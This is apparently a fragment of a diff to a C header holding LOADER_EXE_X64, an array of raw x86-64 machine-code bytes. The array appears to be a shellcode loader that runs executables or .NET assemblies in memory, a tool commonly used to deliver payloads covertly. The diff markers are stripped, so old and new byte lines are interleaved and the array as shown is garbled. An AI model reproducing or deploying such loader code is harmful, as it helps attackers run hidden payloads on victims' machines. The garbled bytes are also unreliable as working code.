0x05, 0x00, 0x00, 0x33, 0xff, 0x48, 0x8b, 0xd9, 0x39, 0xb9, 0x38, 0x02,
0x00, 0x00, 0x0f, 0x84, 0xce, 0x00, 0x00, 0x00, 0x4c, 0x8b, 0x41, 0x28,
0x48, 0x8b, 0x91, 0x88, 0x00, 0x00, 0x00, 0xe8, 0x34, 0x2e, 0x00, 0x00,
0x48, 0x8b, 0x91, 0x88, 0x00, 0x00, 0x00, 0xe8, 0x94, 0x2e, 0x00, 0x00,
0x48, 0x85, 0xc0, 0x0f, 0x84, 0xaf, 0x00, 0x00, 0x00, 0x48, 0x21, 0x7c,
0x24, 0x28, 0x4c, 0x8d, 0x05, 0x77, 0x13, 0x00, 0x00, 0x21, 0x7c, 0x24,
0x24, 0x28, 0x4c, 0x8d, 0x05, 0xd7, 0x13, 0x00, 0x00, 0x21, 0x7c, 0x24,
0x20, 0x4c, 0x8b, 0xcb, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0xd0, 0x4c, 0x8b,
0x43, 0x28, 0x48, 0x8b, 0xcb, 0x48, 0x8b, 0x93, 0x08, 0x02, 0x00, 0x00,
0x48, 0x8b, 0xf8, 0xe8, 0xfc, 0x2d, 0x00, 0x00, 0x4c, 0x8b, 0x43, 0x28,
0x48, 0x8b, 0xf8, 0xe8, 0x5c, 0x2e, 0x00, 0x00, 0x4c, 0x8b, 0x43, 0x28,
0x48, 0x8b, 0xcb, 0x48, 0x8b, 0x93, 0xa0, 0x00, 0x00, 0x00, 0x4c, 0x8b,
0xf0, 0xe8, 0xe6, 0x2d, 0x00, 0x00, 0x4c, 0x8b, 0x43, 0x28, 0x48, 0x8b,
0xf0, 0xe8, 0x46, 0x2e, 0x00, 0x00, 0x4c, 0x8b, 0x43, 0x28, 0x48, 0x8b,
0xcb, 0x48, 0x8b, 0x93, 0xa8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xf0, 0xe8,
0xd0, 0x2d, 0x00, 0x00, 0x33, 0xc9, 0x48, 0x8b, 0xe8, 0xff, 0x53, 0x40,
0x30, 0x2e, 0x00, 0x00, 0x33, 0xc9, 0x48, 0x8b, 0xe8, 0xff, 0x53, 0x40,
0x4c, 0x8b, 0xf8, 0x4d, 0x85, 0xf6, 0x74, 0x4f, 0x48, 0x85, 0xf6, 0x74,
0x4a, 0x48, 0x85, 0xed, 0x74, 0x45, 0xc7, 0x44, 0x24, 0x60, 0x0b, 0x00,
0x10, 0x00, 0xff, 0xd5, 0x48, 0x8b, 0xc8, 0x48, 0x8d, 0x54, 0x24, 0x30,
0xff, 0xd6, 0x8b, 0x83, 0x38, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x4c, 0x24,
0x30, 0x48, 0x83, 0xa4, 0x24, 0xc8, 0x00, 0x00, 0x00, 0xf0, 0x49, 0x03,
0xc7, 0x33, 0xd2, 0x48, 0x89, 0x84, 0x24, 0x28, 0x01, 0x00, 0x00, 0x41,
0xff, 0xd6, 0xeb, 0x0b, 0x48, 0x83, 0xc8, 0xff, 0xeb, 0x08, 0xe8, 0xc9,
0x12, 0x00, 0x00, 0x48, 0x8b, 0xc7, 0x4c, 0x8d, 0x9c, 0x24, 0x00, 0x05,
0xff, 0xd6, 0xeb, 0x0b, 0x48, 0x83, 0xc8, 0xff, 0xeb, 0x08, 0xe8, 0x29,
0x13, 0x00, 0x00, 0x48, 0x8b, 0xc7, 0x4c, 0x8d, 0x9c, 0x24, 0x00, 0x05,
0x00, 0x00, 0x49, 0x8b, 0x5b, 0x20, 0x49, 0x8b, 0x6b, 0x28, 0x49, 0x8b,
0x73, 0x30, 0x49, 0x8b, 0xe3, 0x41, 0x5f, 0x41, 0x5e, 0x5f, 0xc3, 0xcc,
0xf0, 0xff, 0x41, 0x08, 0x8b, 0x41, 0x08, 0xc3, 0xb8, 0x01, 0x40, 0x00,
@ -49,7 +49,7 @@ unsigned char LOADER_EXE_X64[] = {
0x5b, 0xc3, 0xcc, 0xcc, 0x48, 0x8b, 0xc4, 0x53, 0x48, 0x83, 0xec, 0x60,
0x83, 0x60, 0x20, 0x00, 0x48, 0x8d, 0x48, 0xb8, 0x83, 0x60, 0x18, 0x00,
0x48, 0x8b, 0xda, 0x83, 0x60, 0x10, 0x00, 0x33, 0xd2, 0x44, 0x8d, 0x42,
0x40, 0xe8, 0xbe, 0x31, 0x00, 0x00, 0x48, 0x8b, 0x03, 0x48, 0x8d, 0x54,
0x40, 0xe8, 0x1e, 0x32, 0x00, 0x00, 0x48, 0x8b, 0x03, 0x48, 0x8d, 0x54,
0x24, 0x20, 0x48, 0x8b, 0xcb, 0xff, 0x50, 0x18, 0x85, 0xc0, 0x75, 0x1e,
0x48, 0x8b, 0x03, 0x4c, 0x8d, 0x4c, 0x24, 0x78, 0x4c, 0x8d, 0x84, 0x24,
0x80, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xcb, 0x48, 0x8d, 0x94, 0x24, 0x88,
@ -70,38 +70,38 @@ unsigned char LOADER_EXE_X64[] = {
0x28, 0x83, 0x20, 0x00, 0x33, 0xc0, 0xc3, 0xcc, 0x8d, 0x04, 0x11, 0xc3,
0x48, 0x89, 0x5c, 0x24, 0x18, 0x55, 0x56, 0x57, 0x41, 0x56, 0x41, 0x57,
0x48, 0x83, 0xec, 0x20, 0x48, 0x8d, 0x91, 0x54, 0x03, 0x00, 0x00, 0x48,
0x8b, 0xd9, 0xe8, 0x91, 0x28, 0x00, 0x00, 0x48, 0x8b, 0xf0, 0x48, 0x85,
0x8b, 0xd9, 0xe8, 0xf1, 0x28, 0x00, 0x00, 0x48, 0x8b, 0xf0, 0x48, 0x85,
0xc0, 0x75, 0x0a, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xe9, 0xe7, 0x00, 0x00,
0x00, 0x4c, 0x8d, 0x83, 0xc8, 0x05, 0x00, 0x00, 0x45, 0x33, 0xc9, 0x48,
0x8b, 0xd6, 0x48, 0x8b, 0xcb, 0xe8, 0x52, 0x29, 0x00, 0x00, 0x48, 0x8b,
0x8b, 0xd6, 0x48, 0x8b, 0xcb, 0xe8, 0xb2, 0x29, 0x00, 0x00, 0x48, 0x8b,
0xe8, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xc4, 0x00, 0x00, 0x00, 0x48, 0x8d,
0x3d, 0x8f, 0xff, 0xff, 0xff, 0x4c, 0x8d, 0x3d, 0x7c, 0xff, 0xff, 0xff,
0x41, 0x2b, 0xff, 0x0f, 0x88, 0xad, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x4c,
0x24, 0x50, 0x8b, 0xd7, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00, 0x44, 0x8b,
0xf7, 0x48, 0x8b, 0xc8, 0xff, 0x53, 0x60, 0x85, 0xc0, 0x0f, 0x84, 0x8f,
0x00, 0x00, 0x00, 0x44, 0x8b, 0xc7, 0x49, 0x8b, 0xd7, 0x48, 0x8b, 0xcd,
0xe8, 0x2b, 0x30, 0x00, 0x00, 0x44, 0x8b, 0x44, 0x24, 0x50, 0x4c, 0x8d,
0xe8, 0x8b, 0x30, 0x00, 0x00, 0x44, 0x8b, 0x44, 0x24, 0x50, 0x4c, 0x8d,
0x4c, 0x24, 0x58, 0x41, 0x8b, 0xd6, 0x48, 0x8b, 0xcd, 0xff, 0x53, 0x60,
0x4c, 0x8d, 0x83, 0xd8, 0x05, 0x00, 0x00, 0x45, 0x33, 0xc9, 0x48, 0x8b,
0xd6, 0x48, 0x8b, 0xcb, 0xe8, 0xdb, 0x28, 0x00, 0x00, 0x48, 0x8b, 0xf0,
0xd6, 0x48, 0x8b, 0xcb, 0xe8, 0x3b, 0x29, 0x00, 0x00, 0x48, 0x8b, 0xf0,
0x48, 0x85, 0xc0, 0x74, 0x51, 0x48, 0x8d, 0x3d, 0x30, 0xff, 0xff, 0xff,
0x4c, 0x8d, 0x35, 0x1d, 0xff, 0xff, 0xff, 0x41, 0x2b, 0xfe, 0x78, 0x3e,
0x4c, 0x8d, 0x4c, 0x24, 0x50, 0x8b, 0xd7, 0x41, 0xb8, 0x40, 0x00, 0x00,
0x00, 0x8b, 0xef, 0x48, 0x8b, 0xc8, 0xff, 0x53, 0x60, 0x85, 0xc0, 0x74,
0x25, 0x44, 0x8b, 0xc7, 0x49, 0x8b, 0xd6, 0x48, 0x8b, 0xce, 0xe8, 0xc1,
0x2f, 0x00, 0x00, 0x44, 0x8b, 0x44, 0x24, 0x50, 0x4c, 0x8d, 0x4c, 0x24,
0x25, 0x44, 0x8b, 0xc7, 0x49, 0x8b, 0xd6, 0x48, 0x8b, 0xce, 0xe8, 0x21,
0x30, 0x00, 0x00, 0x44, 0x8b, 0x44, 0x24, 0x50, 0x4c, 0x8d, 0x4c, 0x24,
0x58, 0x8b, 0xd5, 0x48, 0x8b, 0xce, 0xff, 0x53, 0x60, 0xe9, 0x11, 0xff,
0xff, 0xff, 0x33, 0xc0, 0x48, 0x8b, 0x5c, 0x24, 0x60, 0x48, 0x83, 0xc4,
0x20, 0x41, 0x5f, 0x41, 0x5e, 0x5f, 0x5e, 0x5d, 0xc3, 0xcc, 0xcc, 0xcc,
0x48, 0x89, 0x5c, 0x24, 0x18, 0x48, 0x89, 0x74, 0x24, 0x20, 0x57, 0x48,
0x83, 0xec, 0x20, 0x48, 0x8d, 0x91, 0x68, 0x03, 0x00, 0x00, 0x48, 0x8b,
0xd9, 0xe8, 0x66, 0x27, 0x00, 0x00, 0x4c, 0x8d, 0x83, 0xe8, 0x05, 0x00,
0x00, 0x45, 0x33, 0xc9, 0x48, 0x8b, 0xd0, 0x48, 0x8b, 0xcb, 0xe8, 0x39,
0xd9, 0xe8, 0xc6, 0x27, 0x00, 0x00, 0x4c, 0x8d, 0x83, 0xe8, 0x05, 0x00,
0x00, 0x45, 0x33, 0xc9, 0x48, 0x8b, 0xd0, 0x48, 0x8b, 0xcb, 0xe8, 0x99,
0x28, 0x00, 0x00, 0x48, 0x8b, 0xf8, 0x48, 0x85, 0xc0, 0x74, 0x42, 0xbe,
0x01, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x4c, 0x24, 0x30, 0x8b, 0xd6, 0x48,
0x8b, 0xc8, 0x44, 0x8d, 0x46, 0x3f, 0xff, 0x53, 0x60, 0x85, 0xc0, 0x74,
0x28, 0x48, 0x8d, 0x93, 0x0c, 0x06, 0x00, 0x00, 0x44, 0x8b, 0xc6, 0x48,
0x8b, 0xcf, 0xe8, 0x2d, 0x2f, 0x00, 0x00, 0x44, 0x8b, 0x44, 0x24, 0x30,
0x8b, 0xcf, 0xe8, 0x8d, 0x2f, 0x00, 0x00, 0x44, 0x8b, 0x44, 0x24, 0x30,
0x4c, 0x8d, 0x4c, 0x24, 0x38, 0x8b, 0xd6, 0x48, 0x8b, 0xcf, 0xff, 0x53,
0x60, 0x8b, 0xc6, 0xeb, 0x02, 0x33, 0xc0, 0x48, 0x8b, 0x5c, 0x24, 0x40,
0x48, 0x8b, 0x74, 0x24, 0x48, 0x48, 0x83, 0xc4, 0x20, 0x5f, 0xc3, 0xcc,
@ -110,7 +110,7 @@ unsigned char LOADER_EXE_X64[] = {
0x78, 0x03, 0x00, 0x00, 0x45, 0x33, 0xff, 0x48, 0x8b, 0xf9, 0x44, 0x21,
0xbd, 0xd8, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x4c, 0x24, 0x60, 0x33, 0xd2,
0x33, 0xf6, 0xbb, 0x00, 0x03, 0x60, 0x04, 0x45, 0x8d, 0x77, 0x68, 0x45,
0x8b, 0xc6, 0xe8, 0xe1, 0x2e, 0x00, 0x00, 0xb9, 0x04, 0x01, 0x00, 0x00,
0x8b, 0xc6, 0xe8, 0x41, 0x2f, 0x00, 0x00, 0xb9, 0x04, 0x01, 0x00, 0x00,
0x44, 0x89, 0x74, 0x24, 0x60, 0x89, 0x4d, 0x80, 0x48, 0x8d, 0x85, 0x60,
0x01, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x78, 0x4c, 0x8d, 0x4c, 0x24,
0x60, 0x89, 0x4d, 0xb0, 0x48, 0x8d, 0x45, 0x50, 0x48, 0x89, 0x45, 0xa8,
@ -186,9 +186,9 @@ unsigned char LOADER_EXE_X64[] = {
0xc0, 0x74, 0x5a, 0x33, 0xc9, 0x8b, 0xd0, 0x41, 0xb8, 0x00, 0x30, 0x00,
0x00, 0x44, 0x8d, 0x49, 0x04, 0xff, 0x57, 0x48, 0x48, 0x89, 0x87, 0x60,
0x0d, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x17, 0x44, 0x8b, 0x85, 0xc0,
0x02, 0x00, 0x00, 0x49, 0x8b, 0xd7, 0x48, 0x8b, 0xc8, 0xe8, 0x2a, 0x2b,
0x02, 0x00, 0x00, 0x49, 0x8b, 0xd7, 0x48, 0x8b, 0xc8, 0xe8, 0x8a, 0x2b,
0x00, 0x00, 0x41, 0x8b, 0xf4, 0xeb, 0x02, 0x8b, 0xf3, 0x44, 0x8b, 0x85,
0xc0, 0x02, 0x00, 0x00, 0x33, 0xd2, 0x49, 0x8b, 0xcf, 0xe8, 0x32, 0x2b,
0xc0, 0x02, 0x00, 0x00, 0x33, 0xd2, 0x49, 0x8b, 0xcf, 0xe8, 0x92, 0x2b,
0x00, 0x00, 0x41, 0xff, 0x55, 0x00, 0x4d, 0x8b, 0xc7, 0x41, 0x8b, 0xd4,
0x48, 0x8b, 0xc8, 0xff, 0x97, 0xe0, 0x00, 0x00, 0x00, 0x4c, 0x8b, 0x6c,
0x24, 0x48, 0x49, 0x8b, 0xce, 0xff, 0x97, 0x70, 0x01, 0x00, 0x00, 0x49,
@ -197,8 +197,8 @@ unsigned char LOADER_EXE_X64[] = {
0x74, 0x48, 0x83, 0xbf, 0x34, 0x02, 0x00, 0x00, 0x03, 0x75, 0x3f, 0x48,
0x8b, 0x9f, 0x60, 0x0d, 0x00, 0x00, 0x48, 0x8d, 0x97, 0x48, 0x0d, 0x00,
0x00, 0x44, 0x8b, 0x8f, 0x58, 0x0d, 0x00, 0x00, 0x48, 0x8d, 0x8f, 0x38,
0x0d, 0x00, 0x00, 0x4c, 0x8b, 0xc3, 0xe8, 0xdd, 0x26, 0x00, 0x00, 0x48,
0x8b, 0x57, 0x28, 0x48, 0x8d, 0x8f, 0x2c, 0x0c, 0x00, 0x00, 0xe8, 0x8d,
0x0d, 0x00, 0x00, 0x4c, 0x8b, 0xc3, 0xe8, 0x3d, 0x27, 0x00, 0x00, 0x48,
0x8b, 0x57, 0x28, 0x48, 0x8d, 0x8f, 0x2c, 0x0c, 0x00, 0x00, 0xe8, 0xed,
0x25, 0x00, 0x00, 0x48, 0x3b, 0x83, 0x18, 0x05, 0x00, 0x00, 0x41, 0x0f,
0x45, 0xf6, 0x8b, 0xc6, 0xeb, 0x02, 0x33, 0xc0, 0x48, 0x81, 0xc4, 0x78,
0x03, 0x00, 0x00, 0x41, 0x5f, 0x41, 0x5e, 0x41, 0x5d, 0x41, 0x5c, 0x5f,
@ -215,10 +215,10 @@ unsigned char LOADER_EXE_X64[] = {
0x8a, 0x00, 0x84, 0xc0, 0x74, 0x14, 0x33, 0xd2, 0xff, 0xc1, 0x0c, 0x20,
0x88, 0x44, 0x15, 0xf0, 0x8b, 0xd1, 0x42, 0x8a, 0x04, 0x01, 0x84, 0xc0,
0x75, 0xee, 0xc6, 0x44, 0x0d, 0xf0, 0x00, 0x49, 0x8b, 0xd1, 0x48, 0x8d,
0x4d, 0xf0, 0xe8, 0xc9, 0x24, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x20,
0x4d, 0xf0, 0xe8, 0x29, 0x25, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x20,
0x48, 0x8b, 0x85, 0x58, 0x01, 0x00, 0x00, 0x8d, 0x4e, 0xff, 0x48, 0x8b,
0x95, 0x68, 0x01, 0x00, 0x00, 0x8b, 0xf1, 0x44, 0x8b, 0xf9, 0x8b, 0x0c,
0x88, 0x48, 0x03, 0xcb, 0xe8, 0xa3, 0x24, 0x00, 0x00, 0x48, 0x33, 0x44,
0x88, 0x48, 0x03, 0xcb, 0xe8, 0x03, 0x25, 0x00, 0x00, 0x48, 0x33, 0x44,
0x24, 0x20, 0x48, 0x3b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x74, 0x1a, 0x85,
0xf6, 0x75, 0xcd, 0x33, 0xc0, 0x48, 0x81, 0xc4, 0x08, 0x02, 0x00, 0x00,
0x41, 0x5f, 0x41, 0x5e, 0x41, 0x5d, 0x41, 0x5c, 0x5f, 0x5e, 0x5b, 0x5d,
@ -246,10 +246,10 @@ unsigned char LOADER_EXE_X64[] = {
0xf9, 0x4c, 0x8b, 0x50, 0x60, 0x49, 0x8b, 0x42, 0x18, 0x48, 0x8b, 0x58,
0x10, 0x4c, 0x39, 0x5b, 0x30, 0x74, 0x2e, 0x4d, 0x85, 0xdb, 0x75, 0x4a,
0x48, 0x8b, 0x53, 0x30, 0x48, 0x3b, 0xd5, 0x74, 0x11, 0x45, 0x33, 0xc9,
0x4c, 0x8b, 0xc6, 0x48, 0x8b, 0xcf, 0xe8, 0x35, 0x21, 0x00, 0x00, 0x4c,
0x4c, 0x8b, 0xc6, 0x48, 0x8b, 0xcf, 0xe8, 0x95, 0x21, 0x00, 0x00, 0x4c,
0x8b, 0xd8, 0x48, 0x8b, 0x1b, 0x48, 0x83, 0x7b, 0x30, 0x00, 0x75, 0xd7,
0x4d, 0x85, 0xdb, 0x75, 0x21, 0x49, 0x8b, 0xd6, 0x48, 0x8b, 0xcf, 0xe8,
0x30, 0x20, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x0e, 0x48, 0x8b, 0xd6,
0x90, 0x20, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x0e, 0x48, 0x8b, 0xd6,
0x48, 0x8b, 0xc8, 0xff, 0x57, 0x38, 0x4c, 0x8b, 0xd8, 0xeb, 0x03, 0x45,
0x33, 0xdb, 0x48, 0x8b, 0x5c, 0x24, 0x30, 0x49, 0x8b, 0xc3, 0x48, 0x8b,
0x6c, 0x24, 0x38, 0x48, 0x8b, 0x74, 0x24, 0x40, 0x48, 0x8b, 0x7c, 0x24,
@ -359,7 +359,7 @@ unsigned char LOADER_EXE_X64[] = {
0x04, 0x0a, 0x41, 0xff, 0xc1, 0x48, 0xff, 0xc1, 0x49, 0xff, 0xc0, 0x8a,
0x01, 0x84, 0xc0, 0x75, 0xe1, 0x4d, 0x85, 0xc0, 0x74, 0x27, 0x49, 0x63,
0xc9, 0x48, 0x8b, 0xd7, 0x48, 0xff, 0xc1, 0x42, 0xc6, 0x44, 0x04, 0x20,
0x00, 0x48, 0x03, 0xd9, 0x48, 0x8d, 0x4c, 0x24, 0x20, 0xe8, 0x4a, 0x23,
0x00, 0x48, 0x03, 0xd9, 0x48, 0x8d, 0x4c, 0x24, 0x20, 0xe8, 0xaa, 0x23,
0x00, 0x00, 0x85, 0xc0, 0x75, 0xa5, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xeb,
0x02, 0x33, 0xc0, 0x48, 0x8b, 0x9c, 0x24, 0xb0, 0x00, 0x00, 0x00, 0x48,
0x81, 0xc4, 0xa0, 0x00, 0x00, 0x00, 0x5f, 0xc3, 0x40, 0x53, 0x48, 0x83,
@ -373,31 +373,39 @@ unsigned char LOADER_EXE_X64[] = {
0x10, 0x48, 0x89, 0x6c, 0x24, 0x18, 0x56, 0x57, 0x41, 0x54, 0x41, 0x56,
0x41, 0x57, 0x48, 0x81, 0xec, 0x30, 0x02, 0x00, 0x00, 0x4c, 0x8b, 0x89,
0xa0, 0x01, 0x00, 0x00, 0x33, 0xc0, 0x45, 0x33, 0xe4, 0x49, 0x8b, 0xf0,
0x48, 0x8b, 0xea, 0x48, 0x8b, 0xf9, 0x41, 0xbf, 0x00, 0x01, 0x00, 0x00,
0x4d, 0x85, 0xc9, 0x0f, 0x84, 0x9a, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x91,
0x60, 0x08, 0x00, 0x00, 0x48, 0x81, 0xc1, 0x50, 0x08, 0x00, 0x00, 0x41,
0xff, 0xd1, 0x85, 0xc0, 0x0f, 0x88, 0xba, 0x00, 0x00, 0x00, 0x48, 0x8d,
0x44, 0x24, 0x30, 0x44, 0x89, 0x7c, 0x24, 0x28, 0x4c, 0x8d, 0x45, 0x0c,
0x48, 0x89, 0x44, 0x24, 0x20, 0x41, 0x83, 0xc9, 0xff, 0x33, 0xd2, 0x33,
0xc9, 0xff, 0x57, 0x70, 0x48, 0x8b, 0x0e, 0x48, 0x8d, 0x5e, 0x08, 0x4c,
0x8d, 0x87, 0x70, 0x08, 0x00, 0x00, 0x4c, 0x8b, 0xcb, 0x48, 0x8d, 0x54,
0x24, 0x30, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x18, 0x85, 0xc0, 0x78, 0x3c,
0x48, 0x8b, 0x0b, 0x48, 0x8d, 0x94, 0x24, 0x60, 0x02, 0x00, 0x00, 0x48,
0x8b, 0x01, 0xff, 0x50, 0x50, 0x85, 0xc0, 0x78, 0x37, 0x44, 0x39, 0xa4,
0x24, 0x60, 0x02, 0x00, 0x00, 0x74, 0x20, 0x48, 0x8b, 0x0b, 0x4c, 0x8d,
0x4e, 0x10, 0x4c, 0x8d, 0x87, 0x90, 0x08, 0x00, 0x00, 0x48, 0x8d, 0x97,
0x80, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x48, 0xeb, 0x03,
0x4c, 0x21, 0x23, 0x85, 0xc0, 0x78, 0x09, 0x4c, 0x39, 0xa7, 0xa0, 0x01,
0x00, 0x00, 0x75, 0x21, 0x48, 0x8d, 0x46, 0x10, 0x33, 0xd2, 0x4c, 0x8d,
0x8f, 0x90, 0x08, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x20, 0x4c, 0x8d,
0x87, 0x80, 0x08, 0x00, 0x00, 0x33, 0xc9, 0xff, 0x97, 0x98, 0x01, 0x00,
0x00, 0x85, 0xc0, 0x79, 0x10, 0x4c, 0x21, 0x66, 0x10, 0x33, 0xc0, 0xe9,
0x45, 0x01, 0x00, 0x00, 0x4c, 0x21, 0x26, 0xeb, 0xcb, 0x48, 0x8b, 0x4e,
0x10, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x50, 0x85, 0xc0, 0x0f, 0x88, 0x2b,
0x01, 0x00, 0x00, 0x4c, 0x8d, 0x85, 0x0c, 0x01, 0x00, 0x00, 0x4c, 0x8d,
0x76, 0x18, 0x45, 0x38, 0x20, 0x75, 0x12, 0x48, 0x8b, 0x4e, 0x10, 0x49,
0x8b, 0xd6, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x68, 0x44, 0x8b, 0xf8, 0xeb,
0x48, 0x48, 0x8d, 0x44, 0x24, 0x30, 0x44, 0x89, 0x7c, 0x24, 0x28, 0x41,
0x48, 0x8b, 0xea, 0x48, 0x8b, 0xf9, 0x4d, 0x85, 0xc9, 0x0f, 0x84, 0xfd,
0x00, 0x00, 0x00, 0x48, 0x8d, 0x91, 0x60, 0x08, 0x00, 0x00, 0x48, 0x81,
0xc1, 0x50, 0x08, 0x00, 0x00, 0x41, 0xff, 0xd1, 0x85, 0xc0, 0x0f, 0x88,
0x1d, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x44, 0x24, 0x30, 0xc7, 0x44, 0x24,
0x28, 0x00, 0x01, 0x00, 0x00, 0x41, 0x83, 0xc9, 0xff, 0x48, 0x89, 0x44,
0x24, 0x20, 0x4c, 0x8d, 0x45, 0x0c, 0xc6, 0x45, 0x0d, 0x34, 0x33, 0xd2,
0xc6, 0x45, 0x11, 0x33, 0x33, 0xc9, 0x66, 0xc7, 0x45, 0x13, 0x33, 0x31,
0xc6, 0x45, 0x15, 0x39, 0xff, 0x57, 0x70, 0x48, 0x8b, 0x0e, 0x48, 0x8d,
0x5e, 0x08, 0x4c, 0x8d, 0xbf, 0x70, 0x08, 0x00, 0x00, 0x4c, 0x8b, 0xcb,
0x4d, 0x8b, 0xc7, 0x48, 0x8d, 0x54, 0x24, 0x30, 0x48, 0x8b, 0x01, 0xff,
0x50, 0x18, 0x85, 0xc0, 0x79, 0x4b, 0x48, 0x8d, 0x44, 0x24, 0x30, 0xc7,
0x44, 0x24, 0x28, 0x00, 0x01, 0x00, 0x00, 0x41, 0x83, 0xc9, 0xff, 0x48,
0x89, 0x44, 0x24, 0x20, 0x4c, 0x8d, 0x45, 0x0c, 0xc6, 0x45, 0x0d, 0x32,
0x33, 0xd2, 0xc6, 0x45, 0x11, 0x35, 0x33, 0xc9, 0x66, 0xc7, 0x45, 0x13,
0x37, 0x32, 0xc6, 0x45, 0x15, 0x37, 0xff, 0x57, 0x70, 0x48, 0x8b, 0x0e,
0x48, 0x8d, 0x54, 0x24, 0x30, 0x4c, 0x8b, 0xcb, 0x4d, 0x8b, 0xc7, 0x48,
0x8b, 0x01, 0xff, 0x50, 0x18, 0x85, 0xc0, 0x78, 0x3c, 0x48, 0x8b, 0x0b,
0x48, 0x8d, 0x94, 0x24, 0x60, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x01, 0xff,
0x50, 0x50, 0x85, 0xc0, 0x78, 0x37, 0x44, 0x39, 0xa4, 0x24, 0x60, 0x02,
0x00, 0x00, 0x74, 0x20, 0x48, 0x8b, 0x0b, 0x4c, 0x8d, 0x4e, 0x10, 0x4c,
0x8d, 0x87, 0x90, 0x08, 0x00, 0x00, 0x48, 0x8d, 0x97, 0x80, 0x08, 0x00,
0x00, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x48, 0xeb, 0x03, 0x4c, 0x21, 0x23,
0x85, 0xc0, 0x78, 0x09, 0x4c, 0x39, 0xa7, 0xa0, 0x01, 0x00, 0x00, 0x75,
0x21, 0x48, 0x8d, 0x46, 0x10, 0x33, 0xd2, 0x4c, 0x8d, 0x8f, 0x90, 0x08,
0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x20, 0x4c, 0x8d, 0x87, 0x80, 0x08,
0x00, 0x00, 0x33, 0xc9, 0xff, 0x97, 0x98, 0x01, 0x00, 0x00, 0x85, 0xc0,
0x79, 0x10, 0x4c, 0x21, 0x66, 0x10, 0x33, 0xc0, 0xe9, 0x48, 0x01, 0x00,
0x00, 0x4c, 0x21, 0x26, 0xeb, 0xcb, 0x48, 0x8b, 0x4e, 0x10, 0x48, 0x8b,
0x01, 0xff, 0x50, 0x50, 0x85, 0xc0, 0x0f, 0x88, 0x2e, 0x01, 0x00, 0x00,
0x4c, 0x8d, 0x85, 0x0c, 0x01, 0x00, 0x00, 0x4c, 0x8d, 0x76, 0x18, 0x45,
0x38, 0x20, 0x75, 0x12, 0x48, 0x8b, 0x4e, 0x10, 0x49, 0x8b, 0xd6, 0x48,
0x8b, 0x01, 0xff, 0x50, 0x68, 0x44, 0x8b, 0xf8, 0xeb, 0x4b, 0x48, 0x8d,
0x44, 0x24, 0x30, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x01, 0x00, 0x00, 0x41,
0x83, 0xc9, 0xff, 0x48, 0x89, 0x44, 0x24, 0x20, 0x33, 0xd2, 0x33, 0xc9,
0xff, 0x57, 0x70, 0x48, 0x8d, 0x4c, 0x24, 0x30, 0xff, 0x97, 0x30, 0x01,
0x00, 0x00, 0x48, 0x8b, 0x4e, 0x10, 0x4d, 0x8b, 0xce, 0x45, 0x33, 0xc0,
@ -459,15 +467,15 @@ unsigned char LOADER_EXE_X64[] = {
0x48, 0x85, 0xc0, 0x75, 0x0d, 0x48, 0x39, 0x87, 0xa0, 0x01, 0x00, 0x00,
0x0f, 0x85, 0xb9, 0x01, 0x00, 0x00, 0xff, 0xc6, 0x3b, 0xb7, 0x3c, 0x02,
0x00, 0x00, 0x72, 0xcd, 0x8b, 0x87, 0x20, 0x09, 0x00, 0x00, 0x83, 0xf8,
0x02, 0x75, 0x1f, 0x48, 0x8b, 0xcf, 0xe8, 0x5d, 0xef, 0xff, 0xff, 0x41,
0x02, 0x75, 0x1f, 0x48, 0x8b, 0xcf, 0xe8, 0xfd, 0xee, 0xff, 0xff, 0x41,
0xbe, 0x01, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0x94, 0x01, 0x00,
0x00, 0x48, 0x8b, 0x9f, 0x60, 0x0d, 0x00, 0x00, 0xeb, 0x23, 0x41, 0xbe,
0x01, 0x00, 0x00, 0x00, 0x83, 0xf8, 0x03, 0x0f, 0x84, 0x7c, 0x01, 0x00,
0x00, 0x48, 0x8d, 0x9f, 0x60, 0x0d, 0x00, 0x00, 0x41, 0x3b, 0xc6, 0x74,
0x08, 0x48, 0x8b, 0x9c, 0x24, 0xb0, 0x01, 0x00, 0x00, 0x44, 0x39, 0xb7,
0x70, 0x05, 0x00, 0x00, 0x74, 0x32, 0x48, 0x8b, 0xcf, 0xe8, 0x56, 0xed,
0x70, 0x05, 0x00, 0x00, 0x74, 0x32, 0x48, 0x8b, 0xcf, 0xe8, 0xf6, 0xec,
0xff, 0xff, 0x85, 0xc0, 0x75, 0x0d, 0x83, 0xbf, 0x70, 0x05, 0x00, 0x00,
0x02, 0x0f, 0x84, 0x46, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xcf, 0xe8, 0x69,
0x02, 0x0f, 0x84, 0x46, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xcf, 0xe8, 0x09,
0xee, 0xff, 0xff, 0x85, 0xc0, 0x75, 0x0d, 0x83, 0xbf, 0x70, 0x05, 0x00,
0x00, 0x02, 0x0f, 0x84, 0x2d, 0x01, 0x00, 0x00, 0x44, 0x39, 0x73, 0x08,
